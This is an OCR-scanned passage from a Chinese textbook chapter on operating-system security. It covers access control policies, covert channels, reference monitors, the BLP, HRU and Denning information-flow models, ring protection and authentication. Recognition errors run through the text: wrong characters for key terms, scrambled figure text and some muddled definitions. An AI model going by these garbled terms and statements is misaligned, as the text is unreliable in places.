用 户 组 ID、 用 户 访 问 许 可 级 别 、 用 户 需 知 属性 、 角 色 、 权 能 列表 (访问 控制 列表 ) 等 。 

客体 属性 包括 等 级 和 非 等 级 。 等 级 是 信息 按 “ 安 全 等 级 ”进行 分 类 ,如 公开 信息 ,机密 信 
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息 、 秘 密 信 息 和 绝密 信息 ; 非 等 级 是 按 功 能 分 类 , 称 为 “范畴 ”, 如 参谋 部 .作战 部 和 后 勤 部 等 。 

3. 操作 系统 的 安全 策略 

安全 策略 指 用 于 授权 使 用 其 计算 机 及 信息 资源 的 规则 , 即 有 关 管 理 、 保 护 、 分 配 和 发 布 
系统 资源 及 敏感 信息 的 规定 和 实施 细则 。 一 个 系统 可 以 有 一 个 或 多 个 安全 策略 ,其 目的 是 
使 安全 需求 得 到 保障 。 安 全 策略 是 构建 可 信 系统 的 坚实 基础 ,而 安全 策略 的 制定 取决 于 用 
户 的 安全 需求 。 

安全 策略 是 系统 针对 面临 的 威胁 所 采用 何 种 对 策 的 方法 , 它 定 义 了 目的 和 目标 ,确定 保 
护 机 制 如 何 被 规范 使 用 。 安 全 策略 是 一 整套 严密 规则 的 集合 ,这 些 规则 决定 授权 存 取 , 是 存 
取 控制 的 基础 。 例 如 ,强制 安全 策略 ,状态 机 策略 。 现 代 操 作 系 统 中 ,策略 有 时 在 用 户 空 间 
指定 ,有 时 在 核心 空间 绑 定 。 

系统 安全 策略 分 为 访问 控制 策略 和 访问 支持 策略 两 大 类 。 

访问 控制 策略 主要 有 自主 访问 控制 策略 和 强制 访问 控制 策略 , 它 反映 了 系统 的 机 密 性 
和 完整 性 。 自 主 访问 控制 根据 系统 中 信息 属 主 指定 方式 或 默认 方式 , 即 按照 用 户 的 意愿 来 
确定 用 户 对 每 一 个 客体 的 访问 权限 ; 它 提供 精细 的 访问 控制 策略 ,能 将 访问 控制 粒度 细 化 到 
单个 用 户 ( 进 程 ), 只 允许 有 权 或 被 授权 用 户 访问 指定 客体 。 强 制 访问 控制 策略 将 系统 内 的 
每 个 用 户 或 主体 赋予 一 个 许可 标记 或 访问 标记 ,以 表示 它 对 敏感 性 客体 的 访问 许可 级 别 , 将 
每 个 客体 赋予 一 个 敏感 性 标记 (Sensitivity Label) ,以 反映 该 客体 的 安全 级 别 。 安 全 系统 通 
过 比较 主 ,客体 的 相应 标记 来 决定 是 否 授 予 一 个 主体 对 客体 的 访问 请 求 权限 。 

访问 支持 策略 用 来 为 保障 访问 控制 策略 正确 实施 提供 可 靠 支持 ,反映 了 系统 的 可 追究 
性 与 可 用 性 ,包括 识别 审计、 确切 保证 .连续 保护 .客体 重用 、 隐 项 通道 处 理 。 访 问 支持 策略 
把 系统 中 的 用 户 与 访问 控制 策略 中 的 “主体 "挂钩 , 用 户 要 进入 系统 必须 要 经 过 “身份 认证 ”， 
确保 试图 访问 资源 的 主体 实际 上 就 是 他 声称 的 主体 ,成 为 系统 中 的 合法 用 户 , 才 能 访问 被 授 
权 的 相应 资源 。 利 用 下 面 任何 一 类 都 可 进行 身份 认证 : 用户 知道 的 信息 (Password) 、 用 户 
拥有 的 东西 (UID) 和 用 户 的 生物 特征 。 

4. 访问 的 可 用 性 

可 用 性 需要 访问 的 确切 保证 和 连续 保护 、 客 体重 用 、 隐 项 信道 (存储 和 时 间 隐 项 通道 )、 
可 信 路 径 和 可 信 恢 复 .访问 控制 等 机 制 来 访问 主客 体 及 其 属性 。 

确切 保证 是 指 系统 事先 制定 的 安全 策略 能 得 到 正确 执行 ,并 且 安 全 系统 能 正确 可 靠 地 
实施 安全 策略 的 意图 。 把 握 安全 系统 从 设计 、 开 发 .安装 和 维护 的 各 个 环节 ,基于 硬件 、 固 
件 、 软 件 来 保证 系统 内 信息 的 安全 ,防止 可 能 造成 的 保护 机 制 失效 或 被 旁 路 的 未 授权 改变 。 

连续 保护 策略 要 求 安全 系统 必须 连续 不 断 地 保护 系统 免 遭 自 改 和 非 授权 改变 。 如 果 用 
来 实现 安全 策略 的 基础 硬件 固件、 软件 自身 容易 受到 算 改 和 破坏 ,那么 没有 任何 一 种 计算 
机 系统 是 安全 的 ,也 就 不 可 能 实现 连续 保护 。 

客体 重用 是 指 重新 分 配给 某 些 主体 的 介质 ,如 页 框 、 磁 带 、 盘 块 .软盘 和 可 控 光 盘 等 ,为 
达到 安全 的 再 分 配 的 目的 ,在 TCB 安全 控制 范围 内 的 存储 介质 作为 系统 资源 被 动态 再 分 配 
给 新 主体 时 ,必须 确保 其 中 不 能 包含 任何 客体 残留 信息 ,以 防止 造成 泄密 。 所 以 ,可 信 计 算 
基 应 确保 : 

(1) 非 授 权 用 户 不 能 查找 在 使 用 后 返还 系统 的 资源 中 的 内 容 。 

(2) 非 授 权 用 户 不 能 查找 现 已 分 配给 他 的 资源 中 以 前 的 内 容 。 
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(3) 系统 应 确保 数据 未 被 未 授权 用 户 修 改过 。 

(4) 系统 自身 和 系统 中 的 数据 应 保持 准确 和 一 致 地 反映 用 户 意图 的 状态 。 

隐 项 通道 指 系统 中 不 受 安全 策略 控制 的 .违反 安全 策略 的 信息 泄露 路 径 。 隐 项 存储 通 
道 是 两 个 进程 利用 不 受 安全 策略 控制 的 存储 单元 传递 信息 。 隐 项 定时 通道 是 两 个 进程 利用 
不 受 安全 策略 控制 的 广义 存储 单元 传递 信息 ,广义 存储 单元 只 能 在 短 时 间 内 保留 信息 。 

可 信 路 径 是 一 种 实现 用 户 与 可 信 计 算 基 之 间 进 行 直接 交互 作用 的 机 制 , 当 连接 用 户 时 
(如 登录 .更改 主体 安全 级 ) ,可 信 计 算 基 应 提供 它 与 用 户 之 间 的 可 信 通 信 路 径 ,该 路 径 上 的 
通信 只 能 由 用 户 和 TCB 激活 ,不 能 由 其 他 软件 (恶意 软件 ) 模 仿 , 且 在 逻辑 上 与 其 他 路 径 上 
的 通信 隔离 ,并 能 正确 加 以 区 分 。 

5. 安全 内 核 与 进程 特权 

安全 内 核 (Security Kernel) 是 指 系统 中 与 安全 性 实现 有 关 的 部 分 ,包括 引用 验证 机 制 、 
访问 控制 机 制 .授权 机 制 和 授权 管理 机 制 。 它 是 实现 参照 监控 器 概念 的 一 种 方法 。 

参照 监控 器 是 为 解决 用 户 程序 的 运行 控制 而 引入 的 ,目的 是 在 用 户 与 系统 资源 之 间 实 
施 一 种 授权 访问 关系 。 它 把 授权 机 制 与 对 程序 的 访问 斥 抽 数据库 
运行 加 以 控制 的 系统 环境 结合 在 一 起 ,对 受 控 共 
享 提供 支持 。 授 权 机 制 负责 确定 用 户 ( 程 序 ) 对 资 | 
源 的 引用 许可 权 , 程 序 运行 控制 把 用 户 程 序 对 资 | 主体 | 参照 监视 器 ”一 | 客体 
源 的 引用 控制 在 授权 的 范围 内 ,如 图 6. 2 所 示 。 

参照 (引用 ) 监 控 器 的 职能 是 以 主体 获得 的 引 
用 权限 为 基准 ,验证 运行 中 的 程序 对 程序 、 数 据 、 
设备 等 的 所 有 引用 。 访 问 控制 数据 库 包含 对 引用 
进行 授权 的 信息 .主体 存 取 的 客体 及 存 取 方 式 的 


审计 文件 
图 6.2 参照 监控 器 


信息 ,由 授权 机 制 负责 ,是 动态 的 。 存 取 判 定 (程序 运行 控制 ) 以 数据 库 信息 为 依据 ,是 安全 
策略 的 具体 实现 。 而 引用 验证 机 制 参照 监控 器 的 具体 实现 。 
操作 系统 与 用 户 ,应 用 程序 和 硬件 的 关系 和 安全 周 界 如 图 6. 3 所 示 。 
用 户 用 户 
系统 外 部 | | | | 系统 外 部 | | | | | | 
系统 接口 系统 接口 
| 应 用 程序 机 st 应 用 程序 
(不 可 信 的 ) 安 (不 可 信 的 ) 
必 一 一 一 一 一 J 一 一 操作 系统 接口 
安全 周 界外 部 操作 系统 周 界 接口 ”安全 周 界外 部 操作 系统 
硬件 接口 一 一 一 一 一 一 一 内 核 接 口 
安全 相关 的 安全 相关 的 | | 安全 内 核 (软件 ) 
(可 信 的 ) (可 信 的 ) 二 一 一 一 一 一 一 硬件 接口 
安全 周 界 内 部 硬件 安全 周 界 内 部 | | 安全 内 核 (硬件 ) 


图 6.3 操作 系统 安全 边界 


一 个 进程 在 不 同时 刻 对 一 个 客体 有 不 同 的 访问 权限 ,取决 于 它 当时 所 执行 的 任务 (用 
户 、 系 统 进程 ) 。 

为 使 系统 能 够 正常 运行 , 某 些 进程 具有 的 可 违反 系统 安全 策略 的 能 力 称 为 特权 。 现 有 
系统 对 特权 的 管理 采用 简单 的 超级 用 户 和 普通 用 户 方法 ,存在 安全 隐患 。 安 全 操作 系统 应 
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采用 最 小 特权 思想 。 最 小 特权 思想 是 指 系统 不 应 给 用 户 超过 执行 任务 所 需 特权 以 外 的 特 
权 , 即 实现 特权 的 细 粒 度 管理 。 

系统 中 每 个 可 执行 文件 或 进程 赋予 相应 特权 集 。 进 程 的 特权 操作 请 求 通过 系统 特权 管 
理 机 制 判 断 该 进程 特权 集中 是 否 具 有 该 特权 操作 。 新 进程 的 特权 由 继承 性 控制 ,继承 的 特 
权 包 括 调用 者 特权 及 运行 文件 特权 。 

特权 传递 的 规则 是 : 文件 的 特权 包括 固定 特权 集 和 可 继承 特权 集 , 固 定 特权 集 可 无 条 
件 传递 ,可 继承 特权 集 与 调用 者 的 交集 传递 。 进 程 的 特权 包括 最 大 特权 集 和 工作 特权 集 , 最 
大 特权 集 为 固定 的 及 可 继承 的 特权 ,工作 特权 集 为 当前 使 用 的 特权 集 。 


6.2.2 安全 模型 


安全 模型 是 对 安全 策略 表达 的 安全 需求 的 抽象 描述 ,为 安全 策略 及 其 实现 机 制 的 关联 
提供 了 一 种 框架 。 模 型 给 出 了 安全 策略 需要 的 实现 机 制 ,给 出 了 安全 系统 的 形式 化 定义 。 

安全 模型 应 包括 安全 的 抽象 、 无 歧义 的 定义 (用 于 制定 安全 策略 ) 和 一 套 操作 规则 (反映 
安全 策略 与 实现 机 制 之 间 的 关联 ) 两 部 分 ,分 为 形式 化 和 非 形式 化 两 种 。 

非 形式 化 安全 模型 仅 模拟 系统 的 安全 功能 ,其 开发 过 程 是 从 安全 需求 出 发 ,推出 功能 规 
范 ,再 实现 安全 系统 ,其 间 主 要 采用 了 论证 与 测试 技术 。 形 式 化 安全 模型 使 用 数学 模型 来 精 
确 地 描述 安全 性 及 其 在 系统 中 使 用 的 情况 ,其 开发 途径 是 建立 抽象 模型 ,推出 形式 化 规范 ， 
通过 证 明 方法 来 实现 安全 系统 。 两 种 安全 模型 的 非 形式 化 开发 途径 。 形式 化 开发 途径 


开发 途径 如 图 6.4 所 示 。 安全 需求 抽象 模型 
形式 化 安全 模型 的 设计 步骤 是 ， 人 4 
(1) 确定 对 外 部 接口 的 要 求 。 此 加 中 
(2) 确定 内 部 要 求 。 功能 规范 形式 化 规范 
(3) 为 策略 的 执行 设计 操作 规则 。 机 
(4) 确定 什么 是 已 知 的 。 4 | 
(5) 论述 一 致 性 和 正确 性 。 2 2 
(6) 论述 关联 性 。 图 6.4 安全 模型 的 开发 途径 


保护 模型 是 根据 系统 .主体 对象. 说 明 主 体 
和 对 象 之 间 的 动态 授权 关系 的 机 制 (规则 ) 来 描述 的 。 主 体 是 正在 一 个 特定 保护 域 中 执行 的 
进程 ,是 一 个 二 元 组 (进程 ,保护 域 ) ;对 象 是 系统 中 所 有 被 动 元 素 和 所 有 主体 。 

1. 状态 机 模型 

原理 是 模仿 操作 系统 和 硬件 执行 过 程 来 描述 计算 机 系统 ,系统 被 看 作 是 一 个 抽象 的 数 
学 状态 机 器 ,状态 变量 表示 机 器 的 状态 ,转换 规则 或 操作 规则 描述 状态 变量 的 变化 过 程 , 它 
是 系统 调用 的 抽象 。 模 型 设计 时 先 确定 模型 要 素 ( 变 量 、 函 数 、 规 则 ) ,安全 初始 状态 ,车 函数 
是 安全 的 , 则 函数 的 调用 必 将 系统 从 安全 状态 转换 成 安全 状态 。 

状态 机 模型 开发 模型 的 步骤 : 

(1) 定义 安全 相关 的 状态 变量 。 

(2) 定义 安全 状态 的 条 件 。 

(3) 定义 状态 转换 函数 。 

(4) 检验 转换 函数 。 
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(5) 定义 初始 状态 。 

(6) 证 明 初始 状态 安全 。 

对 状态 机 模型 进行 改进 ,一 类 是 把 系统 状态 中 与 安全 相关 的 因素 概括 在 一 个 访问 矩阵 
中 ; 另 一 类 是 引入 “ 格 "概念 , 它 是 一 个 有 限 偏 序 集 , 有 最 小 上 界 和 最 大 下 界 操 作 符 的 数学 结 
构 , 利 用 格 的 性 质 来 约束 安全 系统 中 的 变量 ,以 实现 多 级 安全 策略 。 因 此 ,安全 模型 分 成 基 
于 访问 控制 矩阵 的 安全 模型 和 基于 格 的 安全 模型 。 

2. BLP 模型 

Bell-LaPadula 模型 是 状态 机 模型 , 它 形式 化 定义 了 系统 、 系 统 状态 、 状 态 之 间 转 换 规 
则 ;定义 了 安全 特性 ,用 于 约束 系统 状态 和 转换 规则 ;定义 了 安全 概念 ;可 以 证 明 安全 特性 保 
证 初始 安全 状态 转换 为 一 个 安全 状态 。 最 初 应 用 于 军事 。 

系统 由 主体 (进程 ) 和 客体 (数据 文件 ) 组 成 ,主体 对 客体 的 访问 分 为 只 读 (R)、 读 写 
(W) 只 写 (A) ,执行 (E) 及 控制 (C) 几 种 访问 模式 ,C 指 主体 授予 或 撤销 男 一 主体 对 某 一 客 
体 访问 权限 的 能 力 。 安 全 策略 包括 自主 安全 策略 (DAC, 使 用 一 个 访问 矩阵 ) 和 强制 安全 策 
略 (MAC ) 。 

定义 : 系统 = (请 求 集 , 判 定 集 ,状态 转换 ) ,其 中 请 求 = (主体 ,客体 ,访问 类 型 ) ,安全 系 
统 给 定 初始 状态 ,每 次 状态 转换 是 安全 的 。 一 个 保护 的 操作 系统 = (对象 集 ,主体 集 , 安 全 策 
略 规则 集 ) , 称 为 保护 状态 (动态 的 ) ,系统 保证 一 个 主体 S 对 对 象 X 的 每 次 访问 都 要 经 过 检 
测 保 护 状态 ,内 部 保护 状态 只 能 根据 实现 外 部 状态 的 规则 来 改变 。 

保护 状态 可 以 概念 化 为 访问 矩阵 , 即 访问 矩阵 是 保护 状态 的 实现 方法 。 每 次 访问 步 又 : 

(1) 主体 S 开始 对 对 象 X 进行 类 型 为 a 的 访问 。 

(2) 保护 系统 验证 S, 生 成 代表 S 的 请 求 (S,a,X) ,系统 认证 。 

(3) 对 象 X 的 监控 程序 询问 A[S,X], 若 a€ A[S,X] 则 访问 有 效 。 

(4) 访问 有 效 则 系统 生成 请 求 效果 ,可 能 修改 访问 和 矩阵 。 


如 图 6.5 所 示 。 
保护 状态 
状态 变换 


规则 
| 
策略 
监控 程序 
3 | [访问 拓 阵 -2 


图 6.5 Bell-LaPadula 模型 


BLP 模型 系统 状态 定义 : 状态 是 自动 机 (计算 机 ) 在 时 刻 1 的 与 安全 有 关 的 状态 变量 的 

合 , 它 是 一 个 有 序 四 元 组 (6,M,f, 晶 ) ,其 中 5 是 三 元 组 (S,O,A) ,表示 时 刻 上 主体 以 a 
模式 访问 客体 o0,5E (S,O,A);M 为 访问 权限 矩阵 ,描述 上 时 刻 系统 中 主体 对 客体 的 访问 权 
限 ,ME A;/ 是 安全 级 函数 集 , FE 下 ,其 值 为 主 、 客 体 的 密级 及 范畴 ,包括 主体 的 当前 安全 级 
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值 ; 互 代表 当前 客体 的 树 形 层次 结构 ,条 件 是 两 个 子 树 不 相交 、 结 构 无 环 。 

转换 规则 p 描述 当 对 某 一 状态 有 一 个 系统 调用 时 ,系统 产生 的 响应 和 下 一 个 状态 。w 
描述 系统 在 时 刻 : 状态 对 当前 请 求 作出 响应 并 转化 到 下 一 个 状态 。 即 存在 一 个 唯一 的 能 处 
理 该 请 求 的 规则 ,使 系统 从 一 个 状态 转换 到 下 一 个 状态 。 安 全 系统 定义 为 状态 转换 系列 中 
每 个 状态 都 是 安全 的 。 

BLP 模型 的 几 个 重要 公理 : 

(1) 简单 安全 性 。 即 一 个 状态 V=(B,M,F, 瑟 ) 满 足 简单 安全 性 , 当 且 仅 当 请 求 5 中 主 
体 可 读 客 体 ,必定 主体 的 安全 级 支配 客体 安全 级 (主体 级 别 大 于 客体 .主体 范畴 包含 客体 ) 。 
若 请 求 5 中 主体 * 能 读 或 读 写 客体 *, 则 * 的 安全 级 必 支 配 o 的 安全 级 (向 下 读 原则 ) 。 

(2) * 特性 。 即 当 客体 安全 级 支配 主体 安全 级 , 则 可 写 ( 向 上 写 原则 ); 当 主体 安全 级 支 
配 客体 安全 级 , 则 可 读 ; 当主 客体 安全 级 相同 , 则 可 读 写 。 

(3) 自主 安全 性 。 即 状态 V 满足 自主 安全 性 ,如 果 /对 任 一 主体 ; 按照 模式 x 对 客体 o 
的 访问 ,z 必 在 访问 和 矩阵 M 中 。 

(4) 兼容 性 公理 。 即 状态 V 满足 兼容 性 ，/ 对 任意 客体 儿子 的 安全 级 支配 父亲 的 安全 
级 , 即 安全 级 继承 性 。 多 级 安全 策略 如 图 6.6 所 示 , 其 中 W 为 写 ,R 为 读 。 


AR 
5 


图 6.6 多 级 安全 策略 


BLP 模型 的 安全 策略 包括 MAC 和 DAC。MAC 由 简单 安全 特性 和 * 特性 组 成 ,DAC 
由 存 取 控 制 矩 阵 组 成 。BLP 中 使 用 了 可 信和 主体 ,表示 实际 系统 中 不 受 * 特性 约束 的 主体 。 

BLP 模型 存在 以 下 几 个 问题 : 可 信 主 体 不 受 * 特性 约束 ,权限 太 大 ,不 符合 最 小 特权 原 
则 ;BLP 模型 主要 注重 保密 控制 ,不 能 控制 向 上 写 ,而 向 上 写 不 能 限制 隐蔽 通道 。 

3. Lampson 模型 

Lampson 模型 中 客体 被 认为 是 存储 器 ,访问 控制 检查 不 基于 存储 的 内 容 值 而 是 基于 系 
统 的 状态 ,系统 状态 中 与 安全 相关 的 因素 概括 在 访问 矩阵 中 ,由 三 元 组 (S,O,M) 决 定 ,访问 
权限 集 包含 读 、 写 .追加 、 修 改 和 执行 等 。 系 统 中 状态 的 改变 取决 于 访问 和 矩阵 M 的 改变 ,一 
个 独立 的 状态 机 构成 一 个 系统 ,因而 访问 矩阵 也 称 为 系统 的 “保护 状态 ”。 系 统 中 所 有 主体 
对 客体 的 访问 均 由 “引用 监视 器 "控制 , 它 的 任务 是 确保 只 有 那些 在 访问 矩阵 中 获得 授权 的 
操作 才 被 允许 执行 。 

4. Graham-Denning 模型 

此 模型 的 保护 性 能 更 具有 一 般 性 ,对 主体 集合 S、 客 体 集合 O、. 权 力 集合 R 和 访问 控制 
和 矩阵 4 进行 操作 。 主 体 有 一 行 ,每 个 主体 及 所 有 客体 都 有 一 列 , 一 个 主体 对 于 另 一 个 主体 
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或 对 于 一 个 客体 的 权力 用 和 矩阵 元 素 的 内 容 来 表示 。 

对 于 每 个 客体 ,标明 为 “拥有 者 ”的 主体 有 特殊 权力 ;对 于 每 个 主体 ,标明 为 “控制 者 ”的 
另 一 主体 有 特殊 权力 。 本 模型 中 设计 了 8 个 基本 保护 权 , 构 造 一 个 保护 系统 的 访问 控制 机 
制 模型 所 必需 的 性 质 ,这 些 权力 被 表示 成 主体 能 够 发 出 的 命令 ,作用 于 其 他 主体 或 客体 。 如 
表 6.1 所 示 的 HRU(Harrison-Ruzzo-Ullman) 模 型 。 


表 6.1 HRU 模型 的 访问 控制 矩阵 


客 体 
主 体 
Sl S2 S3 Ol O2 O3 
S1 控制 拥有 / 挂 起 /恢复 拥有 读 / 拥 有 执行 
S2 控制 执行 拥有 
53 控制 读 / 写 写 读 


5. D. Denning 信息 流 模 型 

有 些 信 息 泄露 问题 (如 隐蔽 信道 ) 不 是 因为 访问 控制 机 制 不 完善 ,而 是 由 于 缺乏 对 信息 
流 的 必要 保护 引起 的 。 在 系统 中 ,如 果 一 个 主体 S 要 获得 资源 R 所 包含 的 信息 ,主体 S 不 
必 有 具有 对 R 的 实际 访问 权限 ,信息 也 可 能 经 由 其 他 主体 到 达 S, 或 者 信息 只 是 简单 地 被 复制 
到 S 可 以 访问 的 资源 中 ,形成 信息 泄露 。 

Denning 信息 流 模 型 是 存 取 控制 模型 的 一 种 变形 , 它 不 检查 主体 对 客体 的 存 取 , 而 是 试 
图 控制 从 一 个 客体 到 另 一 个 客体 的 信息 传输 过 程 , 根 据 两 个 客体 的 安全 属性 来 决定 是 否 允 
许 当 前 操作 的 执行 。 隐 项 信道 的 核心 是 低 安全 级 主体 对 高 安全 级 主体 所 产生 的 信息 的 间接 
存 取 , 信 息 流 分 析 能 保证 操作 系统 在 对 敏感 信息 存 取 时 不 会 把 数据 泄露 给 调用 者 。 


6.2.3 安全 隔离 设施 


隔离 是 安全 机 制 的 一 个 基本 技术 , 它 的 目的 是 在 不 同 的 实体 之 间 设 置 安全 屏障 ,防止 某 
个 实体 被 其 他 实体 入 侵 , 尤 其 是 防止 较 高 安全 级 别 的 实体 被 较 低 安全 级 别 的 实体 入侵 。 进 
程 地 址 空间 的 保护 就 是 隔离 的 一 个 例子 。 高 级 隔离 包括 面向 “对 象 ”级 别 的 保护 和 虚拟 化 技 
术 ,不 但 将 对 象 的 内 部 实现 和 对 象 的 用 户 隔 离开 了 ,而且 允许 用 户 以 一 种 似乎 不 加 限制 的 方 
法 使 用 对 象 。 

操作 系统 是 硬件 与 应 用 软件 之 间 的 桥梁 。 从 安全 性 考虑 ,系统 应 提供 物理 上 分 离 .时间 
上 分 离 .逻辑 上 分 离 ,密码 上 分 离 。 计 算 机 硬件 安全 的 目标 是 保证 其 自身 的 可 靠 性 ,并 为 操 
作 系 统 提 供 基本 的 安全 设施 ,常用 的 有 内 存 保护 、 运 行 保护 和 I/O 保护 等 。 

1. 内 存 保护 

内 存 保 护 采 用 下 界 和 上 界 寄 存 器 法 、 基 址 和 限 长 寄存 器 法 。 

(1) 内 存 访问 控制 。 进 程 对 内 存 的 访问 采用 用 户 模式 与 系统 模式 、 密 钥 法 以 及 内 存 块 
锁 与 进程 钥匙 配对 法 。 每 个 进程 有 一 个 私有 的 地 址 描述 符 ,进程 对 系统 内 存 某 页 或 某 段 的 
访问 模式 在 描述 符 中 说 明 。 如 图 6. 7 所 示 为 进程 钥匙 与 内 存 锁 配对 的 内 存 访问 控制 。 

(2) 支持 虚拟 内 存 。 进 程 的 存储 空间 的 隔离 可 以 很 容易 地 通过 虚拟 存储 器 的 方法 来 实 
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图 6.7 进程 钥匙 与 内 存 锁 配 对 的 内 存 访问 控制 


现 ,分 段 、 分 页 或 段 页 式 , 提 供 了 管理 和 保护 主 存 的 有 效 方法 ,这 类 系统 通过 段 表 ,页 表 和 段 
页 表 间 接地 访问 虚拟 内 存 的 一 个 段 或 一 个 页 。 

表 对 于 进程 是 私有 的 ,因此 通过 在 有 关 表 项 中 设置 保护 信息 ,每 个 进程 可 以 对 该 进程 能 
(私有 或 共享 ) 访 问 的 任何 段 或 页 面具 有 不 同 的 访问 权限 ,在 每 次 地 址 转换 时 执行 必需 的 权 
限 检查 。 

(3) 沙 盒 技术 。 一 个 进程 调用 的 函数 会 自动 继承 调用 进程 的 所 有 访问 特权 ,特别 是 可 
以 访问 进程 的 整个 虚拟 内 存 。 若 函数 是 不 可 信 的 ,如 Internet 上 下 载 的 程序 ,这 种 不 受 限制 
的 访问 是 不 允许 的 ,会 给 系统 造成 严重 威胁 。 为 了 限制 不 可 信 程 序 造 成 潜在 损害 的 范围 , 系 
统 可 限制 特权 为 调用 进程 所 具有 的 授权 的 一 小 部 分 特权 ,通常 称 这 种 缩小 访问 后 的 环境 为 


“ 沙 使 ”。 
2. 运行 保护 
运行 域 是 进程 运行 的 区 域 ,不 同 的 区 域 具有 不 同 权限 ,形成 进程 运行 的 分 层 隔离 保护 。 
运行 域 正 是 一 种 基于 保护 环 的 层次 等 级 式 结构 ， N 
最 内 层 具有 最 小 环 号 的 环 拥有 最 高 特权 ,最 外 层 隐 妥 限 用 户 
具有 最 大 环 号 的 环 拥有 最 小 特权 。 运 行 域 的 多 R6 受 限 用 户 
环 结构 如 图 6.8 所 示 。 R5 用 户 程序 
一 个 进程 可 以 运行 在 多 个 等 级 域 中 ,在 不 同 R4 用 户 程序 
等 级 域 中 的 进程 对 一 个 段 具有 不 同 的 保护 模式 。 R3 系 统 应 用 程序 
等 级 域 机 制 应 保护 某 一 环 不 被 外 层 环 侵入 , 且 允 Ro 操作 系统 
许 某 一 环 内 的 进程 能 有 效 的 控制 该 环 及 外 环 。 统 
隔离 机 制 保护 进程 免 唱 同一 环 内 同时 运行 的 其 
他 进程 破坏 。 ] 


处 理 器 模式 决定 了 指令 执行 特权 , 即 处 理 器 
当前 可 执行 的 指令 系统 子 集 ; 随 当前 模式 而 增 减 
的 存储 访问 特权 , 即 当前 指令 可 以 存 取 的 虚拟 内 存 的 位 置 。 如 图 6.9 所 示 。 

例如 ,VAX/VMS 的 操作 系统 有 4 种 模式 构成 保护 环 , 其 中 内 核 (Kernel) 态 执行 VMS 
操作 系统 的 内 核 , 包 括 内 存 管理 .中 断 处 理 和 I/O 操作 等 ;执行 (Executive) 态 执行 操作 系统 
的 各 种 系统 调用 ,如 文件 操作 等 ;监管 CSupervisor) 态 执行 操作 系统 其 余 系统 调用 ,如 应 答 
用 户 请 求 ; 用 户 (User) 态 执行 用 户 程序 ,如 编译 .编辑 、 链 接 、 排 错 等 实用 程序 和 各 种 应 用 
程序 。 


图 6.8 运行 域 多 环 结构 图 
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可 执行 


图 6.9 处 理 器 模式 的 访问 权限 


3. 1/0 保护 
CPU 与 计算 机 系统 相连 接 的 各 种 外 围 设备 通信 时 ,必须 读 写 设备 控制 器 提供 的 各 种 寄 
存 器 ,对 这 类 寄存 器 的 访问 可 采用 两 种 途径 : 内 存 映 射 接 口 和 1/O 指令 ( 集 )。 


6.2.4 操作 系统 的 安全 机 制 


安全 (保护 ) 机 制 是 用 来 控制 对 安全 实体 访问 的 工具 ,如 认证 .授权 加密、 审计 和 最 小 特 
权 等 工具 。 

机 制 常 作为 操作 系统 的 可 信 组 件 来 实现 ,策略 常 在 不 可 信 空 间 定义 。 例 如 ,分 页 机 制作 
为 操作 系统 的 一 部 分 和 硬件 结合 实现 ,置换 策略 最 好 由 应 用 (用 户 空 间 ) 控 制 ,原因 是 应 用 对 
选择 策略 有 更 多 的 知识 。 保 护 机 制 能 够 选择 性 地 允许 某 个 主体 访问 安全 实体 ,安全 策略 需 
要 指定 哪些 主体 可 以 访问 计算 机 的 安全 实体 ,哪些 不 行 。 例 如 档案 管理 员 是 安全 机 制 ,档案 
管理 条 例 是 安全 策略 。 

1. 认证 机 制 

认证 是 确保 试图 访问 安全 实体 的 主体 实际 上 就 是 声称 的 主体 。 授 权 是 在 一 个 主体 被 认 
证 后 确定 它 是 否 有 权 访 问安 全 实体 。 安 全 通信 (加 密 /协议 ) 是 当 安全 实体 在 网 络 上 传递 时 
确保 不 被 未 授权 的 访问 。 

用 户 标 识 (Identification) 是 用 来 标明 用 户 身份 ,确保 用 户 的 唯一 性 和 可 辨认 性 的 标志 ， 
一 般 选 用 用 户 名 称 和 用 户 标识 符 (UID) 来 标明 一 个 系统 用 户 , 名 称 和 标识 符 均 为 公开 的 明 
码 信 息 。 用 户 标 识 是 有 效 实施 其 他 安全 策略 ,如 用 户 数据 保护 和 安全 审计 的 基础 。 通 过 为 
用 户 提供 标识 ,TCB 能 使 用 户 对 自己 的 行为 负责 。 

用 户 鉴别 (Authentication) 是 指 用 特定 信息 对 用 户 身 份 .设备 和 其 他 实体 的 真实 性 进行 
确认 ,用 于 鉴别 的 信息 是 非 公 开 的 和 难以 仿造 的 ,如 口令 (也 称 为 密 钥 ) 。 用 户 鉴别 是 有 效 实 
施 其 他 安全 策略 的 基础 。 

操作 系统 采用 标识 与 鉴别 机 制 ,标识 是 系统 为 用 户 或 对 象 分 配 唯 一 的 用 户 对 象 标识 符 ， 
标识 在 用 户 或 对 象 创建 时 进行 。 鉴 别 是 将 用 户 与 用 户 标 识 符 联 系 的 过 程 ,在 登录 时 进行 。 
安全 操作 系统 要 求 TCB 先 标识 用 户 才 可 开始 其 他 活动 ,如 授权 是 系统 为 用 户 授 予 权限 、 安 
全 级 别 、 维 持 和 保护 鉴别 数据 (包括 权限 ,口令 等 )、 阻 断 非法 用 户 访问 、 代 表 用 户 的 进程 与 用 
户 的 绑 定 等 。 

例如 UNIX/Linux 系统 标识 和 鉴别 ,系统 的 /etc/passwd 文件 含有 全 部 系统 掌握 的 关 
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于 每 个 用 户 的 登录 信息 ,加 密 后 的 口令 存 于 /etc/shadow 文件 中 ,口令 文件 包含 用 户 登 录 
名 、 加 密 过 的 口令 ,口令 时 限 、 用 户 号 uid、 用 户 组 号 gid、 用 户 注释 、 用 户主 目录 和 用 户 使 用 
的 shell 程序 。 鉴 别 与 认证 采用 一 次 性 密码 系统 、 质 询 / 应 答 协 议 、 单 向 函数 等 机 制 。 

内 部 线程 /进程 认证 依赖 于 系统 进程 管理 器 的 正确 性 ,进程 /线程 控制 块 PCB/TCB 由 
进程 管理 器 维护 ,用 户 空间 程序 无 法 使 用 。 当 进程 /线程 访问 内 部 资源 时 ,进程 管理 器 提供 
不 可 伪造 的 标识 符 作为 进程 /线程 的 一 部 分 。 

网 络 中 的 认证 使 用 安全 套 接 字 (SSL) 及 传输 层 安全 (TSL) 协 议 、Kerberos 网 络 认 证 机 
制 (过 程 见 第 4 章 )。 

软件 认证 是 证 实 软件 模块 是 否 由 可 信 源 建立 及 证 实 软件 被 期 待 执行 所 赋予 的 行为 , 主 
要 解决 阻止 包含 病毒 的 代码 载 人 受 保护 的 计算 机 域 。 比 如 如 何在 下 载 前 进行 代码 认证 ? 有 
屏蔽 来 阻止 移动 代码 (如 Java 小 程序 ) 在 用 户 的 机 器 上 进行 秘密 操作 吗 ? 

2. 授权 机 制 

